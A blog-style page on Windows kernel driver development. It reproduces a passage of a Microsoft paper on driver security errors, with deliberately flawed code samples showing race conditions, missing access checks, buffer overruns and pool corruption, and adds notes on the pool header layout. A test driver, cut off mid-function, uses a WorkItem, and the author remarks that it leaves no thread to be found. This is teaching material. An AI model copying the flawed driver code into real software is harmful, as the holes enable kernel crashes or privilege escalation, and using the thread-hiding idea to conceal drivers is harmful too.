Specifically, whenever a driver changes global or file object data, it must use a lock or an interlocked sequence to prevent race conditions.

In the following example, a race condition could occur when the driver accesses the global data at Data.LpcInfo.

PLPC_INFO pLpcInfo = &Data.LpcInfo; //Pointer to global data
   ...
   ...
// This saved pointer may be overwritten by another thread.
pLpcInfo->LpcPortName.Buffer = ExAllocatePool(
                                     PagedPool,
                                     arg->PortName.Length);
 

Multiple threads entering this code as a result of an IOCTL call could cause a memory leak when the pointer is overwritten. To avoid this problem, the driver should use the ExInterlockedXxx routines or some type of lock when it changes the global data. The driver’s requirements determine the acceptable types of locks.

The following example attempts to reallocate a file-specific buffer (Endpoint->LocalAddress) to hold the endpoint address.

Endpoint = FileObject->FsContext;

if (Endpoint->LocalAddress != NULL &&
    Endpoint->LocalAddressLength <
       ListenEndpoint->LocalAddressLength ) {

      FREE_POOL (Endpoint->LocalAddress,
                 LOCAL_ADDRESS_POOL_TAG );
      Endpoint->LocalAddress  = NULL;
   }

if ( Endpoint->LocalAddress == NULL ) {
      Endpoint->LocalAddress =
            ALLOCATE_POOL (NonPagedPool,
                     ListenEndpoint->LocalAddressLength,
                     LOCAL_ADDRESS_POOL_TAG);
   }

In this example, a race condition could occur when the file object is accessed. Because the driver does not hold any locks, two requests for the same file object could enter this function. The result might be references to freed memory, multiple attempts to free the same memory, or memory leaks. To avoid these errors, the two if statements should be performed while the driver holds a spin lock.

Shared Access

File system drivers (FSD) and other highest-level drivers must perform access checks against an object’s security descriptor before using IoXxxShareAccess routines to check, set, remove, or update shared access to the object.

To handle shared access, drivers should:

  1. Obtain the requested access from the incoming IRP.
  2. If the IRP major function code is IRP_MJ_CREATE, determine the effective mode of the request. If the value of the Irp->RequestorMode field is KernelMode, check whether the SL_FORCE_ACCESS_CHECK flag is set in the IrpSp->Flags field. If this flag is set, access checks must specify that the request originated in user mode.
  3. Check the requested access against the object’s security descriptor. Pass the access requested in the IRP as the DesiredAccess parameter to SeAccessCheck.
  4. Compare the GrantedAccess returned by SeAccessCheck with the access requested in the IRP. If the GrantedAccess is more restrictive than the access requested in the IRP, complete the IRP with STATUS_ACCESS_DENIED. If the GrantedAccess matches the access requested in the IRP, proceed.
  5. Check the permitted shared access. Use the ACCESS_MASK value returned in the GrantedAccess parameter of SeAccessCheck as the DesiredAccess input parameter to IoCheckShareAccess.

SeAccessCheck sets only those bits in the returned GrantedAccess value that indicate the access actually granted to the user; the MAXIMUM_ALLOWED bit is always cleared in the returned value. To handle shared access correctly, drivers should follow these guidelines:

  • Drivers should inspect the access requested in the IRP before comparing it with the GrantedAccess value returned by SeAccessCheck. If the IRP requests MAXIMUM_ALLOWED, the driver must check the individual bits in the GrantedAccess value to determine whether sufficient access has been granted.
  • Drivers must pass the GrantedAccess value returned by SeAccessCheck as the DesiredAccess input parameter when calling IoXxxShareAccess.

For similar reasons, drivers should not attempt optimizations or partial access control by checking desired access for other bits, such as FILE_WRITE_DATA.

Note   This section describes the correct approach for NTFS and other file systems that use the access control lists (ACLs) supported by the SeXxx routines. An installable file system that uses a different type of ACLs should perform the equivalent access checks with its own rights-granting mechanism.

Locks and Disabling APCs

Certain locking primitives, user-supplied locks, and the unconventional use of events or other objects as locks have the potential to deadlock the system. Kernel-mode drivers that use such locking mechanisms should disable asynchronous procedure calls (APCs), unless the driver runs in a trusted environment (a worker thread). To disable and subsequently re-enable APCs, a device driver calls the KeEnterCriticalRegion and KeLeaveCriticalRegion routines, and a file-system driver calls the FsRtlEnterFileSystem and FsRtlLeaveFileSystem macros. These routines disable the delivery of normal kernel APCs. Special kernel APCs, which run at IRQL APC_LEVEL, are not affected by these routines.

Disabling APCs prevents the thread that currently holds the lock from being suspended by user-mode calls to SuspendThread (which delivers a kernel APC). Typically, such calls occur during debugging, but direct calls to this API are possible from user mode. If APCs are not disabled, the thread that holds the lock never has a chance to release the lock. As a result, other threads in the system are blocked while waiting for it.

Drivers must disable APCs when calling the following system routines:

  • Any of the ExXxxResourceXxx routines. These routines do not disable APCs. Drivers must enclose code that acquires and uses such resources within KeEnterCriticalRegion and KeLeaveCriticalRegion, or FsRtlEnterFileSystem and FsRtlLeaveFileSystem.
  • ExAcquireFastMutexUnsafe.
  • KeWaitForSingleObject for a non-mutex object.

Drivers are not required to disable APCs when calling the following system routines:

  • KeWaitForMutexObject or KeWaitForSingleObject for a mutex object. In this situation, KeWaitForSingleObject and KeWaitForMutexObject automatically disable APCs by the equivalent of KeEnterCriticalRegion.
  • ExAcquireFastMutex. This routine returns to the caller at IRQL APC_LEVEL and therefore blocks all APCs.

The situation is more complicated when driver code in a thread must run in order to release another thread. For example, consider a driver that acts as a communication mechanism between a client and a server thread. When the server thread posts a read, a read IRP enters the driver. Because no data is waiting for the driver, it pends the IRP and sets an appropriate cancel routine. If a client thread then sends a message with a write request, a write IRP enters the driver. Because the pending read IRP is already queued, however, the driver does not handle the write IRP; instead, the driver removes the read IRP from the queue and removes its cancel routine.

Now, assume that the queues that hold the pended IRPs are protected with locks. To improve performance, the driver writer has moved IRP completion outside the locks. This strategy has two advantages:

  • The lock region is smaller, thus improving driver scalability on large multiprocessor hardware.
  • Context swaps are minimized. Other threads that enter the driver are not awakened, and are subsequently blocked by a lock that is owned by the current thread.

Moving completion outside the locks has the following problems, however:

  • After the IRP has been removed from the queue, no cancellation routine is in place and APCs might be enabled.
  • If the client thread is suspended after it releases the lock but before it completes the IRP from the server thread, the server thread will be blocked by the suspended client thread.

To avoid these problems, such drivers should leave APCs disabled until the IRPs have been completed. For example, the following code handles a write request in the named-pipe file system.

FsRtlEnterFileSystem();

NpAcquireSharedVcb();

Status =  NpCommonWrite( IrpSp->FileObject,
          Irp->UserBuffer,
          IrpSp->Parameters.Write.Length,
          Irp->Tail.Overlay.Thread,
          Irp,
          &DeferredList ); // List of IRPs to be
                           //completed after lock release

NpReleaseVcb();

//
// At this point we have released the locks but still
// have kernel APCs disabled.
// We need to prevent this thread from being suspended until
// after we release the server threads.
//

//
// Complete any deferred IRPs after dropping the locks.
//
NpCompleteDeferredIrps (&DeferredList);

//
// Reenable APCs after completing any server IRPs.
// Suspension before completing this thread's IRP doesn't
// matter because it would just block
// this thread anyway and it's suspended.
//
FsRtlExitFileSystem();

if (Status != STATUS_PENDING) {
    NpCompleteRequest (Irp, Status);
    }

For additional information about when waiting threads receive alerts and DPCs, see the Design Guide in the Kernel-Mode Driver Architecture section of the Windows DDK.

Handle Validation

Some drivers must manipulate objects passed to them by callers, or must process two file objects at the same time. For example, a modem driver might receive a handle to an event object, or a network driver might receive handles to two different file objects. The driver must validate these handles. Because they are passed by a caller, and not through the I/O Manager, the I/O Manager cannot perform any validation checks.

In the following example, the driver has been passed the handle AscInfo->AddressHandle, but has not validated it before calling ObReferenceObjectByHandle.

// This handle is embedded in a buffered request.
//
status = ObReferenceObjectByHandle(
                  AscInfo->AddressHandle,
                  0,
                  NULL,
                  KernelMode,
                  &fileObject,
                  NULL);

if (NT_SUCCESS(status)) {
   if ( (fileObject->DeviceObject == DeviceObject) &&
        (fileObject->FsContext2 == TRANSPORT_SOCK) ) {
   ...

The call to ObReferenceObjectByHandle succeeds, but the code fails to ensure that the returned pointer references a file object; it trusts the caller to pass in the correct information. To correct this problem, the driver should pass explicit values for the DesiredAccess and ObjectType parameters.

Even if all the parameters for the call to ObReferenceObjectByHandle are correct, and the call succeeds, a driver can still get unexpected results if the file object is not intended for it. In the following example, the driver fails to ascertain that the call returns a pointer to the file object it expected.

status = ObReferenceObjectByHandle (
                          AcpInfo->Handle,
                          DesiredAccess,
                          *IoFileObjectType,
                          Irp->RequestorMode,
                          (PVOID *)&AcpEndpointFileObject,
                          NULL);

if ( !NT_SUCCESS(status) ) {
   goto complete;
}
AcpEndpoint = AcpEndpointFileObject->FsContext;

if ( AcpEndpoint->Type != BlockTypeEndpoint ) {
...

Although ObReferenceObjectByHandle returns a pointer to a file object, the driver has no guarantee that the pointer references the file object it expected. In this case, the driver should validate the pointer before accessing the driver-specific data at AcpEndpointFileObject->FsContext.

Drivers should validate handles as follows:

  • Check the object type to make sure it is what the driver expects.
  • Ensure that the requested access is appropriate for the object type and the required tasks. If the driver performs a fast file copy, for instance, it must make sure the handle has read access.
  • Specify the correct access mode (UserMode or KernelMode) and verify that the access mode is compatible with the access requested.
  • Validate the handle against the device object or driver if the driver expects a handle to a file object that the driver itself created. Do not break filters that send I/O requests for unexpected devices, however.
  • If the driver supports multiple kinds of file objects, it must be able to differentiate them. For example, TDI drivers use file objects to represent control channels, address objects, and connections. File-system drivers use file objects to represent volumes, directories, and files. Such drivers must determine which type of file object each handle represents.

Requests to Create and Open Files and Devices

Drivers can be vulnerable to problems when requests to create and open files or devices involve the following:

  • Opening files in the device namespace
  • Long file names
  • Unexpected I/O requests
  • Relative open requests for direct device open handles
  • Extended attributes

These issues are described in the following sections.

Opening Files in the Device Namespace

Drivers should set the FILE_DEVICE_SECURE_OPEN device characteristic when they call IoCreateDevice or IoCreateDeviceSecure to create a device object. The FILE_DEVICE_SECURE_OPEN characteristic directs the I/O Manager to apply the security descriptor of the device object to all open requests, including file open requests into the device’s namespace. Setting this characteristic prevents the potential security problems described in this section. For Plug-and-Play drivers, this characteristic is set in the INF file.

Drivers that support exclusive opens are the only exception to this rule. Such drivers should instead fail any IRP_MJ_CREATE requests that specify an IrpSp->FileObject->FileName parameter with a nonzero length.

The I/O Manager does not perform access checks based on the device object for open requests into the device namespace unless FILE_DEVICE_SECURE_OPEN is set. For a device named "\Device\DeviceName," the namespace consists of any name of the form "\Device\DeviceName\FileName."

Omitting access checks can open security holes in drivers that have privileged IOCTL or FSCTL interfaces. The privileged interfaces require write access to the device that is denied to unprivileged users. Unprivileged users can bypass security, however, and obtain handles with read and write access by opening a file in the device’s namespace. To prevent a user from bypassing security, a driver’s DispatchCreate routines must properly handle such create requests.

For example, an unprivileged user who attempts to open \Device\Transport will not be able to create a handle with read or write access to the device. The transport driver has protected IOCTLs, however, that allow administrators to configure the transport (that is, changing the address and so forth). These IOCTLs require write access to the device. (Read and write access requirements are encoded in the IOCTL or FSCTL value). Unless the transport driver sets the FILE_DEVICE_SECURE_OPEN characteristic or has other code to handle the situation, a caller could open \Device\Transport\xyz, and thus gain all access to the file object created. An unprivileged caller could also use a normally opened handle to the transport to request another relative open (with or without a file name) and achieve the same result.

As an alternative to setting FILE_DEVICE_SECURE_OPEN, a driver can perform its own access checks, or it can reject such I/O requests outright. The following shows some sample rejection code.

if ( irpStack->FileObject->RelatedFileObject ||
   irpStack->FileObject->FileName.Length ) {
   Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
   IoCompleteRequest(Irp, IO_NO_INCREMENT);
   return STATUS_ACCESS_DENIED;
}

Long File Names

Long file names in the create path can cause memory leaks and memory pool corruption in some drivers.

The Object Manager limits object paths to 32 KB Unicode characters. The file name length, in bytes, including a trailing Unicode NULL, must be an even number that is less than 64 KB. This limit applies to the whole object path (for example, \Device\Volume1\xxxxxx). The portion presented to the I/O Manager has the leading path to the device object removed, making it significantly shorter than 64 KB.

A driver is unlikely to encounter long file names through standard file open requests. When a caller requests a relative file name open at the native API level, however, the Object Manager and therefore the I/O Manager can present file names that are only a few bytes short of 64 KB.

When handling a relative open request, drivers often try to reconstruct the full path of the file to open. Typically, the driver concatenates the file name of the base file (the file to which the supplied name is relative) with a separator character and the file name of the relative portion. The length of the complete string can easily exceed 64 KB, and therefore will not fit in the 16-bit integer UNICODE_STRING structures that represent the file names in the file objects. As a result, the driver can either corrupt pool or leak memory.

Pool corruption is caused by allocating a buffer that is too short for the target file name, as shown in the following example.

FullNameLengthTemp = RelatedCcb->FullFileName.Length +
                     AddSeparator + FileObjectName->Length;
FullFileName->MaximumLength =
       FullFileName->Length = (USHORT) FullNameLengthTemp;

FullFileName->Buffer = FsRtlAllocatePoolWithTag(
                                        PagedPool,
                                        FullFileName->Length,
                                        MODULE_POOL_TAG);

RtlCopyMemory(FullFileName->Buffer,
              RelatedCcb->FullFileName.Buffer,
              RelatedCcb->FullFileName.Length );

CurrentPosition = Add2Ptr(FullFileName->Buffer,
                          RelatedCcb->FullFileName.Length );

RtlCopyMemory( CurrentPosition,
               FileObjectName->Buffer,
               FileObjectName->Length );

The file name length calculation exceeds 64 KB and the USHORT cast truncates the length. As a result, the allocated buffer is too small and one or both of the calls to RtlCopyMemory corrupt pool.

The memory leak is a subtler problem, which occurs when the file name length is used without truncation to allocate the pool buffer. Because the buffer is large enough, this error does not corrupt pool. The file name-length stored in the file object is truncated to 16 bits, however. If the truncation results in a zero length, the I/O Manager never frees the file name buffer, and a memory leak occurs. A leak can also occur if a driver changes the file name by removing excess backslash characters and these changes make the file name length field zero.

Unexpected I/O Requests

Drivers that create more than one kind of device object must be able to handle I/O requests on every such device object.

Many drivers create more than one kind of device object by calling IoCreateDevice. Some drivers create control device objects in their DriverEntry routines to allow applications to communicate with the driver, even before the driver creates an FDO. For example, before a file system driver calls IoRegisterFileSystem to register itself as a file system, it must create a control device object to handle file system notifications.

A driver should be ready for create requests on any device object it creates. After completing the create request with a success status, the driver should expect to receive any user-accessible I/O requests on the created file object. Consequently, any driver that creates more than one device object must check which device object each I/O request specifies.

For example, a driver might expect that an I/O request specifies an FDO for a specific device, when in fact the request specifies its control device object. If the driver has not initialized the same fields in the device extension of the control device object as in the other device objects, the driver could crash when trying to use device extension information from the control device object.

Relative Open Requests for Direct Device Open Handles

The I/O Manager performs a direct device open in response to create or open requests that meet all of the following criteria:

  • The volume name has no trailing characters. For example, G: is valid, but G:\ and G:\a\b are not.
  • The create request is not relative to another file handle.
  • The requested access includes one or more of the following, and no other access types: SYNCHRONIZE, FILE_READ_ATTRIBUTES, READ_CONTROL, ACCESS_SYSTEM_SECURITY, WRITE_OWNER, or WRITE_DAC.

For a normal create or open request on a storage volume, the I/O Manager typically attempts to mount a file system, if none is already mounted. When performing a direct device open, however, the I/O Manager does not mount or send requests through a file system. Instead, it sends the IRP_MJ_CREATE request directly to the storage stack, bypassing any file system that has been mounted for the volume. Requests for further operations (such as read, write, or DeviceIoControl) on the file handle are sent to the topmost device object in the storage stack for the volume.

The I/O Manager performs a direct device open only when the caller requests limited access to the device, such as the access required to read device attributes. This type of open operation occurs rarely, but is useful when an application wants to query certain attributes of a storage volume without forcing a file system to be mounted.

If an application later sends an open request that is relative to a handle on which the I/O Manager performed a direct device open, the file system stack receives a file object in which the RelatedFileObject field points to an object that the file system has not previously seen. To determine whether the I/O Manager performed a direct device open on a file object, a file system driver can test the FO_DIRECT_DEVICE_OPEN flag in the Flags field of the file object.

On Microsoft Windows NT 4.0 and earlier versions of Windows NT, relative open requests for direct device open handles failed. This problem has been corrected in Microsoft Windows 2000 and later releases.

Extended Attributes

Drivers must validate the size and contents of extended attributes (EAs). EAs are used primarily by TDI drivers during open operations. The redirector (RDR) also uses them to hold user names and passwords for accessing network shares.

The I/O Manager copies and parses EAs to make sure they have the correct format: a keyword (a NULL-terminated, variable-length character string), followed by its value (0 to 65535 bytes). Drivers should not assume, however, that if the keyword is correct the value block contains exactly the data they expect. Even if the keyword is correct, the data size might be too small, thus causing the expected data structure to extend beyond the allocated end of buffer, or to contain garbage.

For example, the following code does not properly validate that the size of the value block is sizeof(PVOID).

ea = (PFILE_FULL_EA_INFORMATION)
      Irp->AssociatedIrp.SystemBuffer;

RtlCopyMemory (
           &connection->Context,
           &ea->EaName[ea->EaNameLength+1],
           sizeof (PVOID));

Drivers also must validate the data within EAs. The following code fails to perform this validation.

ea = OPEN_REQUEST_EA_INFORMATION(Request);
if (ea == NULL) {
    return STATUS_NONEXISTENT_EA_ENTRY;
   }

name = (PTRANSPORT_ADDRESS)&ea->EaName[ea->EaNameLength+1];
AddressName = (PTA_ADDRESS)&name->Address[0];

for (i=0;i<name->TAAddressCount;i++)
...

If the address count is large, the for loop could run beyond the end of the allocated buffer. The driver should check the minimum size of the value, and check each individual address to make sure it is within the buffer.

During internal review, Microsoft found the following error in several drivers that process EAs.

FILE_FULL_EA_INFORMATION UNALIGNED *
FindEA(
    PFILE_FULL_EA_INFORMATION    pStartEA,
    CHAR                        *pTargetName,
    USHORT                       TargetNameLength)
{
    FILE_FULL_EA_INFORMATION UNALIGNED *pCurrentEA;

    do
    {
        Found = TRUE;
        pCurrentEA = pStartEA;
        pStartEA  += pCurrentEA->NextEntryOffset;
...

This code should cast pStartEA to a PUCHAR to send forward a byte count instead of multiples of sizeof (FILE_FULL_EA_INFORMATION).

Driver Unload Routines

Before unloading, drivers must release all driver-allocated resources, cancel all timers, ensure that no deferred procedure calls (DPCs) are queued, and ensure that all driver-created threads have terminated. The operating system frees a driver’s address space soon after unloading the driver. Thereafter, attempting to execute any driver code, for example, in a DPC or driver-created thread, can result in a system crash.

This section outlines the steps that drivers should take to prevent such errors when using the following:

  • Work items
  • Driver-created threads
  • Timers
  • Queued DPCs
  • IoCompletion routines

Work Items

Drivers that use work items should call the IoAllocateWorkItem, IoQueueWorkItem, and IoFreeWorkItem routines instead of the obsolete ExQueueWorkItem and related routines. The newer IoXxxWorkItem routines include unload protection that the obsolete routines did not have.

The IoXxxWorkItem routines ensure that the device object associated with the work item remains available until the callback routine returns. Work item callback routines can set an event immediately before exiting, without risk that the driver will be unloaded before the callback routine returns. After the event is completed, the driver can call IoFreeWorkItem and free any resources shared with the work item.

The obsolete ExQueueWorkItem and related routines did not have this protection mechanism.

Note   The number of threads in which to run work items is limited. Drivers should allocate work items only when needed, and free them as soon as they are no longer required. A driver should not wait until it is unloaded to free work items that are no longer in use.

Driver-Created Threads

Many drivers have separate threads of execution that are created outside the control of the worker thread manager. These threads execute code within a loaded driver. Because a driver’s address space is freed soon after its Unload routine returns, every driver must carefully synchronize the termination of these driver threads. Attempting to execute instructions in a driver thread after the driver is unloaded can cause a system crash.

In the following example, the driver waits on an event that another driver thread will set just before exiting.

KeWaitForSingleObject(
                &Device->UnloadEvent,
                Executive,
                KernelMode,
                FALSE,
                (PLARGE_INTEGER)NULL
                ) {
    };
return;

The following code sets the event.

KeSetEvent(&Device->UnloadEvent,
           IO_NETWORK_INCREMENT,
           FALSE);
return;

If the driver unloads before the final few instructions execute, a fault may occur. In this example, the system could crash if the driver has already been unloaded when the return statement following the call to KeSetEvent is executed.

To prevent this error, drivers that create separate threads should wait on the thread object itself, instead of waiting on an event set by the thread. For example, if a driver calls PsCreateSystemThread to create a thread, the driver can call KeWaitForSingleObject, passing the handle of the thread as the object on which to wait. When the thread calls PsTerminateSystemThread, or returns from its thread routine back to the system, the wait is satisfied. The driver can now safely unload because the thread has exited.

Timers

Drivers that use timers must also unload carefully. Drivers must cancel any timers that are queued, wait for any CustomTimerDpc routines that are running, and synchronize access to driver structures from DPC routines.

A driver can cancel a one-shot timer in its Unload routine. To cancel a one-shot timer, the driver calls KeCancelTimer. If KeCancelTimer returns TRUE, the timer is not running. If KeCancelTimer returns FALSE, the timer DPC is currently running and the driver must not free any driver-allocated resources until after the DPC has finished running.

The operating system forces any DPCs that are already running to run to completion, even after the driver Unload routine returns (but before deleting the driver’s address space). A driver can therefore wait on an event signaled by the DPC. The DPC should signal the event after it has finished accessing any resources, typically immediately before returning. When the event wait is satisfied, the driver can safely free those resources and unload.

Drivers that use periodic timers must take an additional step. The driver first calls KeCancelTimer to disable the periodic timer. KeCancelTimer always returns TRUE for such timers, however, because as soon as a periodic timer expires, the operating system queues another such timer; consequently, periodic timers always appear to be queued.

To make sure that any DPCs for a periodic timer have completed, a driver must also call KeFlushQueuedDpcs. KeFlushQueuedDpcs returns after all queued DPCs on all processors have run. Although this routine is expensive in terms of performance, a driver must call it in this situation.

Queued DPCs

Before unloading a driver, the operating system flushes driver-queued DPCs other than those for periodic timers, as described in the preceding section. Therefore, drivers that queue DPCs are not required to call KeFlushQueuedDpcs before unloading; however, such drivers must synchronize access to ensure that the DPC routine has finished using resources before the driver frees them. A driver can use the same kind of event wait mechanism described for one-shot timers.

IoCompletion Routines

In rare cases, an IoCompletion routine can run in parallel with a driver’s Unload routine. If the Unload routine waits for an event set by the IoCompletion routine, the event could be satisfied and the driver unloaded before the IoCompletion routine runs to completion. This is a problem only for drivers that do not use Plug and Play.

To avoid this problem, drivers for Windows XP and later can use the IoSetCompletionRoutineEx routine to set the IoCompletion routine. IoSetCompletionRoutineEx protects the IoCompletion routine from driver unload.

Pageable Drivers and DPCs

Drivers that queue DPCs and make themselves pageable are not required to flush DPCs before calling MmPageEntireDriver. The operating system flushes DPCs before paging the driver, but the driver must ensure that neither it nor another thread queues any additional DPCs until the driver is once again locked in memory.

User-Mode APIs

This section describes errors that can occur when drivers are called by the following user-mode APIs.

  • NtReadFile and NtWriteFile
  • TransmitFile

NtReadFile and NtWriteFile

Drivers that read and write data in response to the user-mode APIs NtReadFile and NtWriteFile must be able to handle the negative file offsets that can be passed with these APIs. The I/O Manager performs limited checks on these offsets.

NtWriteFile accepts negative LARGE_INTEGER values to signify a write to end of file and a write to current position. NtReadFile accepts a negative offset, which indicates the current position read. No other negative offsets are accepted.

The I/O Manager does not reject transfers where the offset plus the transfer length cause the offset of the buffer end to wrap from positive to negative.

TransmitFile

The Win32 TransmitFile API issues an IOCTL to the system afd.sys driver (AFD) to do fast file copies over the network. The AFD provides support for Windows Sockets API to communicate with underlying transports. During internal testing, Microsoft found several drivers that encountered problems when their handles were passed to the TransmitFile API. Some looped, completing read requests with a success status but with zero bytes read; others had cancellation problems.

The Device Path Exerciser, DevCtl, includes the /w option to test a driver by using TransmitFile. Microsoft recommends testing drivers for these problems.

StartIo Recursion

If many device requests are outstanding, calls to IoStartNextPacket or IoStartNextPacketByKey from a driver’s StartIo routine can result in recursive calls back to the StartIo routine without unwinding the stack.

Drivers that call these routines from the StartIo routine should first call the IoSetStartIoAttributes routine, with the DeferredStartIo parameter set to TRUE. Doing so causes the I/O Manager to keep track of the nesting level of the calls, and dispatch to the StartIo routine only after the current StartIo call has returned.

Passing and Completing IRPs

Drivers commonly have the following problems in passing and completing IRPs:

  • Copying stack locations incorrectly.
  • Returning incorrect status for an IRP that the driver does not handle.
  • Losing IRPs or completing them more than once.
  • Returning incorrect status for an IRP that the driver issues.

Copying Stack Locations Incorrectly

When passing an IRP down the stack, drivers should always use the standard functions IoSkipCurrentIrpStackLocation and IoCopyCurrentIrpStackLocationToNext. Do not write driver-specific code to copy the stack location. Using the standard routines ensures that the driver does not duplicate the IoCompletion routine of a driver layered above it.

For example, the following code can duplicate an IoCompletion routine and cause problems.

currentStack = IoGetCurrentIrpStackLocation (Irp) ;
nextStack = IoGetNextIrpStackLocation (Irp) ;

RtlMoveMemory (nextStack,
               currentStack,
               sizeof (IO_STACK_LOCATION));

Returning Incorrect Status for an IRP That the Driver Does Not Handle

A driver must not return STATUS_SUCCESS for an IRP that it does not handle.

For example, some drivers incorrectly return STATUS_SUCCESS for query IRPs, even though they do not support the required functionality. Doing so can easily crash or corrupt the system, particularly during operations like file name look-ups, if the I/O Manager or another component attempts to use data that was left uninitialized by the Dispatch routine.

Unless otherwise noted in the documentation for a specific IRP, a driver should return STATUS_NOT_SUPPORTED for any IRP it does not handle. Plug-and-Play drivers might also return STATUS_INVALID_DEVICE_REQUEST to indicate that the IRP is inappropriate for the device.

Losing IRPs or Completing Them More Than Once

IRPs that are lost or completed more than once, along with missing calls to I/O Manager routines such as IoStartNextPacket, often occur in error-handling paths. A "lost" IRP is one that the device has finished, but the driver never completed by calling IoCompleteRequest or passing it to another driver.

Quick reviews of code paths can often find such problems. In addition, the DC2 and DevCtl tools can assist in finding lost IRPs. The DC2 and DevCtl tools are provided in the Tools directory of the Windows DDK.

Returning Incorrect Status from an IRP That the Driver Issues

Unlike drivers to which an IRP is forwarded, the driver that issues an IRP must not propagate the SL_PENDING_RETURNED bit in its IoCompletion routine for that IRP. Doing so corrupts the memory pool following the IRP.

When a driver receives an IRP from another driver, it must propagate the SL_PENDING_RETURNED bit if it returns STATUS_MORE_PROCESSING_REQUIRED for the IRP. Therefore, IoCompletion routines for IRPs that are forwarded from another driver typically include the following code.

If (Irp->PendingReturned)
    IoMarkIrpPending(Irp);

The driver that issued the IRP, however, must not include this statement. The issuing driver is the final recipient of the IRP; further processing is not required. When the issuing driver’s IoCompletion routine is called, the DeviceObject parameter is NULL and the I/O stack location points to the location immediately following the end of the IRP, causing corruption of the pool header for the next memory allocation.

Odd-length Unicode Buffers

Some I/O Manager APIs support Unicode input buffers that contain an odd number of bytes. The optional file name in NtQueryDirectoryFile, and many queries using NtQueryInformationFile (such as FileNameInformation), are examples. Drivers should test the lengths of these buffers upon input.

Pool Allocation in Low Memory

When the system is low on pool memory, calling ExAllocatePool with the pool type NonPagedPoolMustSucceed causes the system to crash. This can occur, for example, on a web server where client spikes are frequent and short, but the occurrences use a great deal of pool memory and can cause memory to become fragmented temporarily.

Drivers should not use this flag. Instead, drivers should allocate nonpaged memory with the NonPagedPool or NonPagedPoolCacheAligned flags and, if ExAllocatePool returns NULL, return the status STATUS_INSUFFICIENT_RESOURCES.

In addition, Microsoft Windows XP and Windows 2000 drivers must use MmGetSystemAddressForMdlSafe instead of MmGetSystemAddressForMdl. WDM drivers must use MmGetSystemAddressForMdl with the MDL_MAPPING_CAN_FAIL MDL flag, because MmGetSystemAddressForMdlSafe is not supported on Windows 98 and Windows Me.

For more information on pool allocation failures, see Low Pool Memory and Windows XP, available on the Microsoft website.

Call to Action and Resources

Call to Action:

  • Find and correct errors in existing drivers. Use the Driver Verifier, DC2, and DevCtl utilities in the Windows DDK.
  • Analyze code paths, particularly those involving locks, to uncover any problems described in this paper.
  • Always validate pointers obtained from user-mode callers.
  • Always check buffer sizes to prevent buffer overruns and underruns.

Resources:

2005年11月08日
//
//      Caveat Programmer:
//
//              The pool header must be QWORD (8 byte) aligned in size.  If it
//              is not, the pool allocation code will trash the allocated
//              buffer
//
//
//
// The layout of the pool header is:
//
//         31              23         16 15             7            0
//         +----------------------------------------------------------+
//         | Current Size |  PoolType+1 |  Pool Index  |Previous Size |
//         +----------------------------------------------------------+
//         |   ProcessBilled   (NULL if not allocated with quota)     |
//         +----------------------------------------------------------+
//         | Zero or more longwords of pad such that the pool header  |
//         | is on a cache line boundary and the pool body is also    |
//         | on a cache line boundary.                                |
//         +----------------------------------------------------------+
//
//      PoolBody:
//
//         +----------------------------------------------------------+
//         |  Used by allocator, or when free FLINK into sized list   |
//         +----------------------------------------------------------+
//         |  Used by allocator, or when free BLINK into sized list   |
//         +----------------------------------------------------------+
//         ... rest of pool block...
//
//
// N.B. The size fields of the pool header are expressed in units of the
//      smallest pool block size.
//

typedef struct _POOL_HEADER {
    union {
        struct {
            UCHAR PreviousSize;
            UCHAR PoolIndex;
            UCHAR PoolType;
            UCHAR BlockSize;
        };
        ULONG Ulong1;                       // used for InterlockedCompareExchange required by Alpha
    };
#ifdef _WIN64
    ULONG PoolTag;
#endif
    union {
        EPROCESS *ProcessBilled;
#ifndef _WIN64
        ULONG PoolTag;
#endif
        struct {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER;

所以要找pool的TAg的时候,一般就在分配的地址的前4个字节

kd> dt _POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 ProcessBilled    : Ptr32 _EPROCESS
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B

2005年11月07日
看到了WorkItem这种形式,如果用WorkItem来代替threAd,则就没有线程可以被查到了,但是ddk上说WorkItem只能短期用,长期用会造成死锁,我试了下,果然一个循环建立的WorkItem会让系统卡住,所以不能把它当成线程那样一直执行.想到异步的IRP队列,比如把需要处理的请求放入一个队列,用Event或者SemAphore,每当队列中请求到来时就处理.不知道当WorkItem wAit的时候算不算长期的使用呢?哎 还不懂WorkItem的原理..
下面的程序大该验证了下使用WorkItem的方法,至于Irp queue…慢慢来了 :>
#include <ntddk.h>
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   );

PDEVICE_OBJECT	pDeviceObject;
ULONG			i = 0;
PIO_WORKITEM	pIo_WorkItem;
KEVENT			Kevent;

//--------------------------------------------------------------------
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
	//Work items are a limited system resource, and drivers should free
	//them as soon as they are no longer required. For example, drivers
	//should not wait until Unload to free any work items not in use.
	//IoFreeWorkItem(pIo_WorkItem1);
	KeSetEvent(&Kevent,
				IO_NO_INCREMENT,
				FALSE
				);
	IoDeleteDevice(pDeviceObject);
	DbgPrint("My Driver Unloaded!\n");
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath )
{
	NTSTATUS		dwStAtus;

	DbgPrint("My Driver Loaded!\n");

	pDriverObject->DriverUnload = OnUnload;

	KeInitializeEvent(&Kevent,
						SynchronizationEvent,
						FALSE
						);
	dwStAtus = IoCreateDevice(pDriverObject,
								0,
								NULL,
								FILE_DEVICE_UNKNOWN,
								0,
								FALSE,
								&pDeviceObject
								);
	pIo_WorkItem = IoAllocateWorkItem(pDeviceObject);
	IoQueueWorkItem(pIo_WorkItem,
					IoWorkItemRoutine,
					DelayedWorkQueue,
					&i
					);

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   )
{
	DbgPrint("in IoWorkItemRoutine %d\n",(*(PULONG)Context)++);
